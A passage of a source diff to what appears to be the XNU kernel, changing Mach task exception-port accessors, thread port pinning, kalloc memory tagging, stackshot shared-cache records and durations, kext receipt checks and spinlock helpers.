exception_mask, + exception_mask_array_t masks, + mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, + exception_behavior_array_t behaviors, + thread_state_flavor_array_t flavors) +{ + kern_return_t kr; + + task_t task = convert_port_to_task_read_no_eval(port); + + if (task == TASK_NULL) { + return KERN_INVALID_ARGUMENT; + } + + kr = task_get_exception_ports_internal(task, exception_mask, masks, CountCnt, + ports_info, NULL, behaviors, flavors); + + task_deallocate(task); + return kr; +} + kern_return_t task_get_exception_ports_from_user( mach_port_t port, @@ -3958,7 +4488,7 @@ task_get_exception_ports_from_user( { kern_return_t kr; - task_t task = convert_port_to_task_check_type(port, NULL, TASK_FLAVOR_CONTROL, FALSE); + task_t task = convert_port_to_task_no_eval(port); if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; @@ -3969,3 +4499,35 @@ task_get_exception_ports_from_user( task_deallocate(task); return kr; } + +/* + * Routine: ipc_thread_port_unpin + * Purpose: + * Called on the thread port when the thread is + * terminating so that the last ref can be deallocated + * without a guard exception. + * Conditions: + * Thread mutex lock is held. + * check_bit should be set to true only when port is expected + * to have ip_pinned bit set. + */ +void +ipc_thread_port_unpin( + ipc_port_t port, + __unused bool check_bit) +{ + if (port == IP_NULL) { + return; + } + ip_lock(port); + imq_lock(&port->ip_messages); +#if DEVELOPMENT || DEBUG + if (pinned_control_port_enabled && check_bit) { + assert(ip_is_control(port)); /*remove once we get rid of boot-arg */ + assert(port->ip_pinned == 1); + } +#endif + port->ip_pinned = 0; + imq_unlock(&port->ip_messages); + ip_unlock(port); +} diff --git a/osfmk/kern/ipc_tt.h b/osfmk/kern/ipc_tt.h index 2ebe7e289..1e8d2c401 100644 --- a/osfmk/kern/ipc_tt.h +++ b/osfmk/kern/ipc_tt.h @@ -93,9 +93,16 @@ extern void ipc_task_reset( extern void ipc_task_terminate( task_t task); +__options_decl(ipc_thread_init_options_t, uint32_t, { + IPC_THREAD_INIT_NONE = 0x00, + IPC_THREAD_INIT_PINNED = 0x01, + IPC_THREAD_INIT_IMMOVABLE = 0x02, +}); + /* Initialize a thread's IPC state */ extern void ipc_thread_init( - thread_t thread); + thread_t thread, + ipc_thread_init_options_t options); extern void ipc_thread_init_exc_actions( thread_t thread); @@ -168,6 +175,10 @@ extern task_read_t convert_port_to_task_read( extern task_t convert_port_to_task( ipc_port_t port); +/* Convert from a port to a pinned task */ +extern task_t convert_port_to_task_pinned( + ipc_port_t port); + extern task_t convert_port_to_task_with_exec_token( ipc_port_t port, @@ -183,9 +194,6 @@ extern task_read_t port_name_to_task_read( extern task_read_t port_name_to_task_read_no_eval( mach_port_name_t name); -extern task_inspect_t port_name_to_task_inspect( - mach_port_name_t name); - extern task_t port_name_to_task_name( mach_port_name_t name); @@ -254,4 +262,10 @@ extern void space_read_deallocate( extern void space_inspect_deallocate( ipc_space_inspect_t space); +#if MACH_KERNEL_PRIVATE +extern void ipc_thread_port_unpin( + ipc_port_t port, + bool check_bit); +#endif + #endif /* _KERN_IPC_TT_H_ */ diff --git a/osfmk/kern/kalloc.c b/osfmk/kern/kalloc.c index 6c4127fa6..b77841e1c 100644 --- a/osfmk/kern/kalloc.c +++ b/osfmk/kern/kalloc.c @@ -750,8 +750,8 @@ kalloc_large( zalloc_flags_t flags, vm_allocation_site_t *site) { - int kma_flags = KMA_ATOMIC | KMA_KOBJECT; - vm_tag_t tag = VM_KERN_MEMORY_KALLOC; + int kma_flags = KMA_ATOMIC; + vm_tag_t tag; vm_map_t alloc_map; vm_offset_t addr; @@ -764,6 +764,16 @@ kalloc_large( return (struct kalloc_result){ }; } +#ifndef __x86_64__ + /* + * (73465472) on Intel we didn't use to pass this flag, + * which in turned allowed kalloc_large() memory to be shared + * with user directly. + * + * We're bound by this unfortunate ABI. + */ + kma_flags |= KMA_KOBJECT; +#endif if (flags & Z_NOPAGEWAIT) { kma_flags |= KMA_NOPAGEWAIT; } @@ -781,8 +791,13 @@ kalloc_large( alloc_map = kalloc_map_for_size(size); - if (site) { - tag = vm_tag_alloc(site); + tag = zalloc_flags_get_tag(flags); + if (tag == VM_KERN_MEMORY_NONE) { + if (site) { + tag = vm_tag_alloc(site); + } else { + tag = VM_KERN_MEMORY_KALLOC; + } } if (kmem_alloc_flags(alloc_map, &addr, size, tag, kma_flags) != KERN_SUCCESS) { @@ -864,7 +879,6 @@ kalloc_ext( zalloc_flags_t flags, vm_allocation_site_t *site) { - vm_tag_t tag = VM_KERN_MEMORY_KALLOC; vm_size_t size; void *addr; zone_t z; @@ -881,7 +895,7 @@ kalloc_ext( * Kasan for kalloc heaps will put the redzones *inside* * the allocation, and hence augment its size. * - * kalloc heaps do not use zone_t::kasan_redzone. + * kalloc heaps do not use zone_t::z_kasan_redzone. */ #if KASAN_KALLOC size = kasan_alloc_resize(req_size); @@ -903,15 +917,19 @@ kalloc_ext( assert(size <= zone_elem_size(z)); #if VM_MAX_TAG_ZONES - if (z->tags && site) { - tag = vm_tag_alloc(site); - if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) && !vm_allocation_zone_totals[tag]) { - tag = VM_KERN_MEMORY_KALLOC; + if (z->tags) { + vm_tag_t tag = zalloc_flags_get_tag(flags); + if (tag == VM_KERN_MEMORY_NONE && site) { + tag = vm_tag_alloc(site); + } + if (tag != VM_KERN_MEMORY_NONE) { + tag = vm_tag_will_update_zone(tag, z->tag_zone_index, + flags & (Z_WAITOK | Z_NOWAIT | Z_NOPAGEWAIT)); } + flags |= Z_VM_TAG(tag); } #endif - addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats, - flags | Z_VM_TAG(tag), zone_elem_size(z) - size); + addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats, flags); #if KASAN_KALLOC addr = (void *)kasan_alloc((vm_offset_t)addr, zone_elem_size(z), diff --git a/osfmk/kern/kcdata.h b/osfmk/kern/kcdata.h index f2eaf624c..d57bd0c27 100644 --- a/osfmk/kern/kcdata.h +++ b/osfmk/kern/kcdata.h @@ -492,7 +492,7 @@ struct kcdata_type_definition { #define STACKSHOT_KCTYPE_TASK_SNAPSHOT 0x905u /* task_snapshot_v2 */ #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT 0x906u /* thread_snapshot_v2, thread_snapshot_v3 */ #define STACKSHOT_KCTYPE_DONATING_PIDS 0x907u /* int[] */ -#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 */ +#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* dyld_shared_cache_loadinfo */ #define STACKSHOT_KCTYPE_THREAD_NAME 0x909u /* char[] */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME 0x90Au /* struct stack_snapshot_frame32 */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME64 0x90Bu /* struct stack_snapshot_frame64 */ @@ -556,17 +556,42 @@ struct dyld_uuid_info_64 { uuid_t imageUUID; }; +/* + * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures + * instead of this, since the field names match their contents better. + */ struct dyld_uuid_info_64_v2 { uint64_t imageLoadAddress; /* XXX image slide */ uuid_t imageUUID; /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ - uint64_t imageSlidBaseAddress; /* slid base address of image */ + uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */ +}; + +/* + * This is the renamed version of dyld_uuid_info_64 with more accurate + * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO. Any users + * must be aware of the dyld_uuid_info_64* version history and ensure + * the fields they are accessing are within the actual bounds. + * + * OLD_FIELD NEW_FIELD + * imageLoadAddress sharedCacheSlide + * imageUUID sharedCacheUUID + * imageSlidBaseAddress sharedCacheUnreliableSlidBaseAddress + * - sharedCacheSlidFirstMapping + */ +struct dyld_shared_cache_loadinfo { + uint64_t sharedCacheSlide; /* image slide value */ + uuid_t sharedCacheUUID; + /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ + uint64_t sharedCacheUnreliableSlidBaseAddress; /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */ + /* end of version 2 of dyld_uuid_info_64. sizeof v2 was 32 */ + uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */ }; struct dyld_aot_cache_uuid_info { - uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */ + uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */ uuid_t x86UUID; /* UUID of x86 shared cache */ - uint64_t aotSlidBaseAddress; /* slide base address of aot cache */ + uint64_t aotSlidBaseAddress; /* slide first mapping address of aot cache */ uuid_t aotUUID; /* UUID of aot shared cache */ }; @@ -618,6 +643,9 @@ enum task_snapshot_flags { kTaskIsDirtyTracked = 0x4000000, kTaskAllowIdleExit = 0x8000000, kTaskIsTranslated = 0x10000000, + kTaskSharedRegionNone = 0x20000000, /* task doesn't have a shared region */ + kTaskSharedRegionSystem = 0x40000000, /* task is attached to system shared region */ + kTaskSharedRegionOther = 0x80000000, /* task is attached to a different shared region */ }; enum thread_snapshot_flags { @@ -876,6 +904,12 @@ struct stackshot_duration { uint64_t stackshot_duration_outer; } __attribute__((packed)); +struct stackshot_duration_v2 { + uint64_t stackshot_duration; + uint64_t stackshot_duration_outer; + uint64_t stackshot_duration_prior; +} __attribute__((packed)); + struct stackshot_fault_stats { uint32_t sfs_pages_faulted_in; /* number of pages faulted in using KDP fault path */ uint64_t sfs_time_spent_faulting; /* MATUs spent faulting */ diff --git a/osfmk/kern/kern_stackshot.c b/osfmk/kern/kern_stackshot.c index 6edec68be..f424b0aee 100644 --- a/osfmk/kern/kern_stackshot.c +++ b/osfmk/kern/kern_stackshot.c @@ -53,6 +53,7 @@ #include #include #include +#include #include #include #include @@ -115,6 +116,8 @@ static boolean_t panic_stackshot; static boolean_t stack_enable_faulting = FALSE; static struct stackshot_fault_stats fault_stats; +static uint32_t stackshot_initial_estimate; +static uint64_t stackshot_duration_prior_abs; /* prior attempts, abs */ static unaligned_u64 * stackshot_duration_outer; static uint64_t stackshot_microsecs; @@ -385,6 +388,11 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui goto out; } + stackshot_initial_estimate = 0; + stackshot_duration_prior_abs = 0; + stackshot_duration_outer = NULL; + uint64_t time_start = mach_absolute_time(); + istate = ml_set_interrupts_enabled(FALSE); /* Preload trace parameters*/ @@ -399,6 +407,10 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui ml_set_interrupts_enabled(istate); + uint64_t time_end = mach_absolute_time(); + if (stackshot_duration_outer) { + *stackshot_duration_outer = time_end - time_start; + } *bytes_traced = kdp_stack_snapshot_bytes_traced(); out: @@ -691,7 +703,9 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi goto error_exit; } + stackshot_duration_prior_abs = 0; stackshotbuf_size = get_stackshot_estsize(size_hint); + stackshot_initial_estimate = stackshotbuf_size; for (; stackshotbuf_size <= max_tracebuf_size; stackshotbuf_size <<= 1) { if (kmem_alloc_flags(kernel_map, (vm_offset_t *)&stackshotbuf, stackshotbuf_size, VM_KERN_MEMORY_DIAG, KMA_ZERO) != KERN_SUCCESS) { @@ -755,6 +769,8 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi /* * If we didn't allocate a big enough buffer, deallocate and try again. */ + stackshot_duration_prior_abs += + (time_end - time_start); continue; } else { goto error_exit; @@ -968,16 +984,25 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_ kern_return_t error = KERN_SUCCESS; uint64_t shared_cache_slide = 0; - uint64_t shared_cache_base_address = 0; + uint64_t shared_cache_first_mapping = 0; uint32_t kdp_fault_results = 0; - struct dyld_uuid_info_64_v2 shared_cache_data = {0}; + struct dyld_shared_cache_loadinfo shared_cache_data = {0}; assert(task_snap_ss_flags != NULL); + /* Get basic info about the shared region pointer, regardless of any failures */ + if (task->shared_region == NULL) { + *task_snap_ss_flags |= kTaskSharedRegionNone; + } else if (task->shared_region == primary_system_shared_region) { + *task_snap_ss_flags |= kTaskSharedRegionSystem; + } else { + *task_snap_ss_flags |= kTaskSharedRegionOther; + } + if (task->shared_region && ml_validate_nofault((vm_offset_t)task->shared_region, sizeof(struct vm_shared_region))) { struct vm_shared_region *sr = task->shared_region; - shared_cache_base_address = sr->sr_base_address + sr->sr_first_mapping; + shared_cache_first_mapping = sr->sr_base_address + sr->sr_first_mapping; } else { *task_snap_ss_flags |= kTaskSharedRegionInfoUnavailable; @@ -985,7 +1010,7 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_ } /* We haven't copied in the shared region UUID yet as part of setup */ - if (!shared_cache_base_address || !task->shared_region->sr_uuid_copied) { + if (!shared_cache_first_mapping || !task->shared_region->sr_uuid_copied) { goto error_exit; } @@ -995,15 +1020,27 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_ */ shared_cache_slide = task->shared_region->sr_slide; - if (task->shared_region == init_task_shared_region) { + if (task->shared_region == primary_system_shared_region) { /* skip adding shared cache info -- it's the same as the system level one */ goto error_exit; } - shared_cache_data.imageLoadAddress = shared_cache_slide; - stackshot_memcpy(&shared_cache_data.imageUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid)); - shared_cache_data.imageSlidBaseAddress = shared_cache_base_address; - kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(struct dyld_uuid_info_64_v2), &shared_cache_data)); + /* + * Historically, this data was in a dyld_uuid_info_64 structure, but the + * naming of both the structure and fields for this use wasn't great. The + * dyld_shared_cache_loadinfo structure has better names, but the same + * layout and content as the original. + * + * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field + * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT + * entries; here, it's the slid first mapping, and we leave it that way + * for backwards compatibility. + */ + shared_cache_data.sharedCacheSlide = shared_cache_slide; + stackshot_memcpy(&shared_cache_data.sharedCacheUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid)); + shared_cache_data.sharedCacheUnreliableSlidBaseAddress = shared_cache_first_mapping; + shared_cache_data.sharedCacheSlidFirstMapping = shared_cache_first_mapping; + kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(shared_cache_data), &shared_cache_data)); error_exit: if (kdp_fault_results & KDP_FAULT_RESULT_PAGED_OUT) { @@ -1347,7 +1384,7 @@ kcdata_record_task_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t trace cur_tsnap->ts_did_throttle = (uint32_t) proc_did_throttle_from_task(task); cur_tsnap->ts_suspend_count = task->suspend_count; - cur_tsnap->ts_faults = task->faults; + cur_tsnap->ts_faults = counter_load(&task->faults); cur_tsnap->ts_pageins = task->pageins; cur_tsnap->ts_cow_faults = task->cow_faults; cur_tsnap->ts_latency_qos = (task->effective_policy.tep_latency_qos == LATENCY_QOS_TIER_UNSPECIFIED) ? @@ -1471,7 +1508,7 @@ kcdata_record_task_delta_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t cur_tsnap->tds_max_resident_size = get_task_resident_max(task); cur_tsnap->tds_suspend_count = task->suspend_count; - cur_tsnap->tds_faults = task->faults; + cur_tsnap->tds_faults = counter_load(&task->faults); cur_tsnap->tds_pageins = task->pageins; cur_tsnap->tds_cow_faults = task->cow_faults; cur_tsnap->tds_was_throttled = (uint32_t)proc_was_throttled_from_task(task); @@ -2348,6 +2385,9 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac if (trace_flags & STACKSHOT_PAGE_TABLES) { kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stack_snapshot_pagetable_mask, "stackshot_pagetable_mask")); } + if (stackshot_initial_estimate != 0) { + kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stackshot_initial_estimate, "stackshot_size_estimate")); + } #if STACKSHOT_COLLECTS_LATENCY_INFO latency_info.setup_latency = mach_absolute_time(); @@ -2383,28 +2423,41 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, KCDATA_TYPE_USECS_SINCE_EPOCH, sizeof(uint64_t), &stackshot_microsecs)); /* record system level shared cache load info (if available) */ - if (!collect_delta_stackshot && init_task_shared_region && - ml_validate_nofault((vm_offset_t)init_task_shared_region, sizeof(struct vm_shared_region))) { - struct dyld_uuid_info_64_v2 sys_shared_cache_info = {0}; + if (!collect_delta_stackshot && primary_system_shared_region && + ml_validate_nofault((vm_offset_t)primary_system_shared_region, sizeof(struct vm_shared_region))) { + struct dyld_shared_cache_loadinfo sys_shared_cache_info = {0}; - stackshot_memcpy(sys_shared_cache_info.imageUUID, &init_task_shared_region->sr_uuid, sizeof(init_task_shared_region->sr_uuid)); - sys_shared_cache_info.imageLoadAddress = - init_task_shared_region->sr_slide; - sys_shared_cache_info.imageSlidBaseAddress = - init_task_shared_region->sr_slide + init_task_shared_region->sr_base_address; + /* + * Historically, this data was in a dyld_uuid_info_64 structure, but the + * naming of both the structure and fields for this use isn't great. The + * dyld_shared_cache_loadinfo structure has better names, but the same + * layout and content as the original. + * + * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field + * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT + * entries; here, it's the slid base address, and we leave it that way + * for backwards compatibility. + */ + stackshot_memcpy(sys_shared_cache_info.sharedCacheUUID, &primary_system_shared_region->sr_uuid, sizeof(primary_system_shared_region->sr_uuid)); + sys_shared_cache_info.sharedCacheSlide = + primary_system_shared_region->sr_slide; + sys_shared_cache_info.sharedCacheUnreliableSlidBaseAddress = + primary_system_shared_region->sr_slide + primary_system_shared_region->sr_base_address; + sys_shared_cache_info.sharedCacheSlidFirstMapping = + primary_system_shared_region->sr_base_address + primary_system_shared_region->sr_first_mapping; kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, - sizeof(struct dyld_uuid_info_64_v2), &sys_shared_cache_info)); + sizeof(sys_shared_cache_info), &sys_shared_cache_info)); if (trace_flags & STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT) { /* * Include a map of the system shared cache layout if it has been populated * (which is only when the system is using a custom shared cache). */ - if (init_task_shared_region->sr_images && ml_validate_nofault((vm_offset_t)init_task_shared_region->sr_images, - (init_task_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) { - assert(init_task_shared_region->sr_images_count != 0); - kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), init_task_shared_region->sr_images_count, init_task_shared_region->sr_images)); + if (primary_system_shared_region->sr_images && ml_validate_nofault((vm_offset_t)primary_system_shared_region->sr_images, + (primary_system_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) { + assert(primary_system_shared_region->sr_images_count != 0); + kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), primary_system_shared_region->sr_images_count, primary_system_shared_region->sr_images)); } } } @@ -2502,7 +2555,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac if (!panic_stackshot && (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS)) { coalition_begin_cpu_cycle_count = mt_cur_cpu_cycles(); } -#endif +#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */ /* Iterate over coalitions */ if (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS) { @@ -2530,7 +2583,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac kcd_exit_on_error(kcdata_add_uint64_with_description(stackshot_kcdata_p, (mt_cur_cpu_cycles() - coalition_begin_cpu_cycle_count), "coalitions_cpu_cycle_count")); } -#endif +#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */ } #else trace_flags &= ~(STACKSHOT_SAVE_JETSAM_COALITIONS); @@ -2557,7 +2610,6 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac } } - #if STACKSHOT_COLLECTS_LATENCY_INFO latency_info.total_terminated_task_iteration_latency = mach_absolute_time() - latency_info.total_terminated_task_iteration_latency; #endif /* STACKSHOT_COLLECTS_LATENCY_INFO */ @@ -2576,22 +2628,22 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac /* update timestamp of the stackshot */ abs_time_end = mach_absolute_time(); -#if DEVELOPMENT || DEBUG - struct stackshot_duration stackshot_duration; - stackshot_duration.stackshot_duration = (abs_time_end - abs_time); - stackshot_duration.stackshot_duration_outer = 0; + struct stackshot_duration_v2 stackshot_duration = { + .stackshot_duration = (abs_time_end - abs_time), + .stackshot_duration_outer = 0, + .stackshot_duration_prior = stackshot_duration_prior_abs, + }; if ((trace_flags & STACKSHOT_DO_COMPRESS) == 0) { kcd_exit_on_error(kcdata_get_memory_addr(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION, - sizeof(struct stackshot_duration), &out_addr)); - struct stackshot_duration *duration_p = (void *) out_addr; + sizeof(struct stackshot_duration_v2), &out_addr)); + struct stackshot_duration_v2 *duration_p = (void *) out_addr; stackshot_memcpy(duration_p, &stackshot_duration, sizeof(*duration_p)); stackshot_duration_outer = (unaligned_u64 *)&duration_p->stackshot_duration_outer; } else { kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION, sizeof(stackshot_duration), &stackshot_duration)); stackshot_duration_outer = NULL; } -#endif #if INTERRUPT_MASKED_DEBUG && MONOTONIC if (!panic_stackshot) { @@ -2610,15 +2662,20 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac *pBytesTraced = (uint32_t) kcdata_memory_get_used_bytes(stackshot_kcdata_p); *pBytesUncompressed = (uint32_t) kcdata_memory_get_uncompressed_bytes(stackshot_kcdata_p); -error_exit: +error_exit:; #if INTERRUPT_MASKED_DEBUG - if (trace_flags & STACKSHOT_DO_COMPRESS) { + bool disable_interrupts_masked_check = kern_feature_override( + KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD) || + (trace_flags & STACKSHOT_DO_COMPRESS) != 0; + +#if STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED + disable_interrupts_masked_check = true; +#endif /* STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED */ + + if (disable_interrupts_masked_check) { ml_spin_debug_clear_self(); } -#if defined(STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED) - ml_spin_debug_clear_self(); -#endif if (!panic_stackshot && interrupt_masked_debug) { /* @@ -2627,7 +2684,7 @@ error_exit: */ ml_check_stackshot_interrupt_disabled_duration(current_thread()); } -#endif +#endif /* INTERRUPT_MASKED_DEBUG */ stack_enable_faulting = FALSE; @@ -2668,10 +2725,8 @@ kdp_mem_and_io_snapshot(struct mem_and_io_snapshot *memio_snap) uint64_t compressions = 0; uint64_t decompressions = 0; - percpu_foreach(stat, vm_stat) { - compressions += stat->compressions; - decompressions += stat->decompressions; - } + compressions = counter_load(&vm_statistics_compressions); + decompressions = counter_load(&vm_statistics_decompressions); memio_snap->snapshot_magic = STACKSHOT_MEM_AND_IO_SNAPSHOT_MAGIC; memio_snap->free_pages = vm_page_free_count; @@ -3105,7 +3160,7 @@ stackshot_thread_group_snapshot(void *arg, int i, struct thread_group *tg) { struct thread_group_snapshot_v2 *thread_groups = (struct thread_group_snapshot_v2 *)arg; struct thread_group_snapshot_v2 *tgs = &thread_groups[i]; - uint64_t flags = kdp_thread_group_get_flags(tg); + uint32_t flags = thread_group_get_flags(tg); tgs->tgs_id = thread_group_get_id(tg); stackshot_memcpy(tgs->tgs_name, thread_group_get_name(tg), THREAD_GROUP_MAXNAME); tgs->tgs_flags = ((flags & THREAD_GROUP_FLAGS_EFFICIENT) ? kThreadGroupEfficient : 0) | diff --git a/osfmk/kern/kext_alloc.c b/osfmk/kern/kext_alloc.c index 5a689341f..2abe7d4d9 100644 --- a/osfmk/kern/kext_alloc.c +++ b/osfmk/kern/kext_alloc.c @@ -39,6 +39,7 @@ #include #include #include +#include #include #define KASLR_IOREG_DEBUG 0 @@ -246,23 +247,57 @@ kext_free(vm_offset_t addr, vm_size_t size) kern_return_t kext_receipt(void **addrp, size_t *sizep) { + kern_return_t ret = KERN_FAILURE; if (addrp == NULL || sizep == NULL) { - return KERN_FAILURE; + goto finish; } kernel_mach_header_t *kc = PE_get_kc_header(KCKindAuxiliary); if (kc == NULL) { - return KERN_FAILURE; + ret = KERN_MISSING_KC; + goto finish; + } + + /* + * This will be set in early boot once we've successfully checked that + * the AuxKC is properly linked against the BootKC. If this isn't set, + * and we have a valid AuxKC mach header, then the booter gave us a + * bad KC. + */ + if (auxkc_uuid_valid == FALSE) { + ret = KERN_INVALID_KC; + goto finish; } size_t size; void *addr = getsectdatafromheader(kc, kReceiptInfoSegment, kAuxKCReceiptSection, &size); if (addr == NULL) { - return KERN_FAILURE; + ret = KERN_INVALID_KC; + goto finish; } *addrp = addr; *sizep = size; - return KERN_SUCCESS; + ret = KERN_SUCCESS; + +finish: + /* + * If we do return success, we'll want to wait for the other side to + * call kext_receipt_set_queried themselves, so we can confirm that + * it made the roundtrip before allowing third party kexts to load. + */ + if (ret != KERN_SUCCESS) { + kext_receipt_set_queried(); + } + return ret; +} + +/* + * Returns KERN_FAILURE if the variable was already set. + */ +kern_return_t +kext_receipt_set_queried() +{ + return OSKextSetReceiptQueried(); } diff --git a/osfmk/kern/kext_alloc.h b/osfmk/kern/kext_alloc.h index a629bec2e..70d34ff9e 100644 --- a/osfmk/kern/kext_alloc.h +++ b/osfmk/kern/kext_alloc.h @@ -43,6 +43,8 @@ void kext_free(vm_offset_t addr, vm_size_t size); kern_return_t kext_receipt(void **addrp, size_t *sizep); +kern_return_t kext_receipt_set_queried(void); + __END_DECLS #endif /* _KEXT_ALLOC_H_ */ diff --git a/osfmk/kern/lock_stat.h b/osfmk/kern/lock_stat.h index 0214122e5..ae29df20d 100644 --- a/osfmk/kern/lock_stat.h +++ b/osfmk/kern/lock_stat.h @@ -121,18 +121,18 @@ enum lockstat_probe_id { #if CONFIG_DTRACE extern uint32_t lockstat_probemap[LS_NPROBES]; -extern void (*lockstat_probe)(uint32_t, uint64_t, uint64_t, +extern void dtrace_probe(uint32_t, uint64_t, uint64_t, uint64_t, uint64_t, uint64_t); /* * Macros to record lockstat probes. */ #define LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3) \ - { \ - uint32_t id; \ - if (__improbable(id = lockstat_probemap[(probe)])) { \ - (*lockstat_probe)(id, (uintptr_t)(lp), (arg0), \ - (arg1), (arg2), (arg3)); \ - } \ + { \ + uint32_t id; \ + if (__improbable(id = lockstat_probemap[(probe)])) { \ + dtrace_probe(id, (uintptr_t)(lp), (arg0), \ + (arg1), (arg2), (arg3)); \ + } \ } #define LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3) #define LOCKSTAT_RECORD__(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3) diff --git a/osfmk/kern/locks.c b/osfmk/kern/locks.c index aa28feb62..9e626c3de 100644 --- a/osfmk/kern/locks.c +++ b/osfmk/kern/locks.c @@ -497,7 +497,7 @@ lck_attr_free( * * Initialize a hardware lock. */ -void +MARK_AS_HIBERNATE_TEXT void hw_lock_init(hw_lock_t lock) { ordered_store_hw(lock, 0); @@ -672,23 +672,13 @@ void hw_lock_lock_internal(lock, thread LCK_GRP_ARG(grp)); } -/* - * Routine: hw_lock_to - * - * Acquire lock, spinning until it becomes available or timeout. - * Timeout is in mach_absolute_time ticks, return with - * preemption disabled. - */ -unsigned -int -(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp)) +static inline unsigned int +hw_lock_to_internal(hw_lock_t lock, uint64_t timeout, thread_t thread + LCK_GRP_ARG(lck_grp_t *grp)) { - thread_t thread; - uintptr_t state; + uintptr_t state; unsigned int success = 0; - thread = current_thread(); - disable_preemption_for_thread(thread); state = LCK_MTX_THREAD_TO_STATE(thread) | PLATFORM_LCK_ILOCK; #if LOCK_PRETEST if (ordered_load_hw(lock)) { @@ -710,6 +700,40 @@ end: return success; } +/* + * Routine: hw_lock_to + * + * Acquire lock, spinning until it becomes available or timeout. + * Timeout is in mach_absolute_time ticks, return with + * preemption disabled. + */ +unsigned +int +(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp)) +{ + thread_t thread = current_thread(); + disable_preemption_for_thread(thread); + return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp)); +} + +/* + * Routine: hw_lock_to_nopreempt + * + * Acquire lock, spinning until it becomes available or timeout. + * Timeout is in mach_absolute_time ticks, called and return with + * preemption disabled. + */ +unsigned +int +(hw_lock_to_nopreempt)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp)) +{ + thread_t thread = current_thread(); + if (__improbable(!preemption_disabled_for_thread(thread))) { + panic("Attempt to test no-preempt spinlock %p 